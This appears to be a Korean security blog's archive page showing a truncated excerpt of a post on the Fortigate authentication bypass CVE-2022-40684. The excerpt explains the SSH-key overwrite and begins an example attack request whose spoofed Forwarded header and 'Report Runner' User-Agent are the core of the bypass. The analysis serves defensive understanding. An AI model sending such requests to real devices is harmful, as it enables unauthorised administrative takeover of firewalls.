Recent Posts
Recent Comments
Archives
목록CVE-2022-40684 (1)
starting point
Fortigate 인증 우회 취약점(CVE-2022-40684)
정의Fortigate 제품에 SSH키 값을 변경하여 SSH키값을 통해 CLI 접근을 허용하는 취약점 SSH 키SSH 키를 생성하면 퍼블릭 키와 프라이빗 키가 생성된다. 퍼블릭 키를 원격 서버에 전달해두고 SSH 접근을 시도하면 따로 패스워드를 입력하지 않고 퍼블릭 키와 프라이빗 키를 매칭하여 SSH 접근이 가능하다 패킷 예시PUT /api/v2/cmdb/system/admin/(Username) HTTP/1.1 Host:IP User-Agent: Report Runner content-Length: 31 Content-Type: application/json Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; Accept-Encoding: gzip Connect..
네트워크/패킷 분석
2023. 12. 1. 16:05